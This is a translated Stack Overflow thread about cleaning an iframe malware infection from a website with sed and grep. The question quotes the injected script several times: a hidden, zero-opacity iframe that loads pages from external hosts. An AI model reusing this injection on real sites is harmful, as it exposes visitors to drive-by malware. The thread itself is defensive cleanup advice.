文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
首页
学习
活动
专区
圈层
工具
MCP广场
返回腾讯云官网
社区首页 >问答首页 >清理iframe恶意软件

清理iframe恶意软件
EN

Stack Overflow用户
提问于 2012-10-24 06:51:02
回答 3查看 796关注 0票数 1

我正在帮助某人清理网站上的恶意软件感染,我很难正确匹配sed中的一些字符串,这样我就可以创建一个脚本来大规模搜索和替换/删除它。

这些字符串是:

代码语言:javascript
运行
复制
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>

<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script>

<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>

我似乎想不出如何转义这些行中的各种字符...

如果我尝试只说删除整行,如果它与http://vidintex.com/includes/class.pop.php匹配,它也会删除.html文件中结束的html </body>

因此,我需要能够在sed中匹配这整行:

代码语言:javascript
运行
复制
    <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>

任何帮助都将不胜感激!

malware
linux
sed
EN

回答 3

Stack Overflow用户

回答已采纳

发布于 2012-10-24 06:54:42

您可以尝试这样做:

代码语言:javascript
运行
复制
sed -i '/vidintex.com\/includes\/class.pop.php/d' files*

这将删除包含vidintex.com/includes/class.pop.php的所有行

票数 1
EN

Stack Overflow用户

发布于 2012-10-30 22:36:01

您可以在sourceforge上开始使用SMScanner!它会立即解决你的问题

票数 0
EN

Stack Overflow用户

发布于 2015-05-04 19:46:56

Looking for script to delete iframe malware from linux server类似,您可以查找位于最终body标记旁边的script标记,并将其仅替换为body标记。此脚本将查找所有受影响的文件并删除最终脚本。

它可能会找到最后带有脚本的正版文件-所以首先检查grep for files是否只找到受感染的文件。

代码语言:javascript
运行
复制
# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</script></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<script .*><\/script><\/body>/<\/body>/g'
票数 0
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/13040532

复制
相关文章

相似问题

领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档